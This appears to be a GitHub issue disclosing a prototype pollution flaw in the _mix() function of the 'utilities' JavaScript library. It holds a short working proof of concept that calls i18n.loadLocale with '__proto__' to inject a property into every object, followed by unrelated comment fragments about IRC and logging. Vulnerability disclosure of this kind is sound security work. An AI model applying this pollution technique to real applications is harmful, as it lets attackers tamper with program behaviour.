utilities
A classic collection of JavaScript utilities
Hi, there's a prototype pollution vulnerability in function _mix() in utilities/lib/core.js. The risk is located here: https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L65 https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L41 and the POC is:
```
var utilities = require("utilities")
bad_objects= {test:"123"}
console.log("Before:"+{}.test)
utilities.i18n.loadLocale("__proto__",bad_objects,{},true)
```
...
Hey @mde I brought this up in IRC yesterday and thought I would dig into it a little more to see if there was something I could fix or file...
I think they're just asking about custom logging. Yeah maybe. Which we don't support yet. I was going to attack the logging, until we bumped the auth stuff up....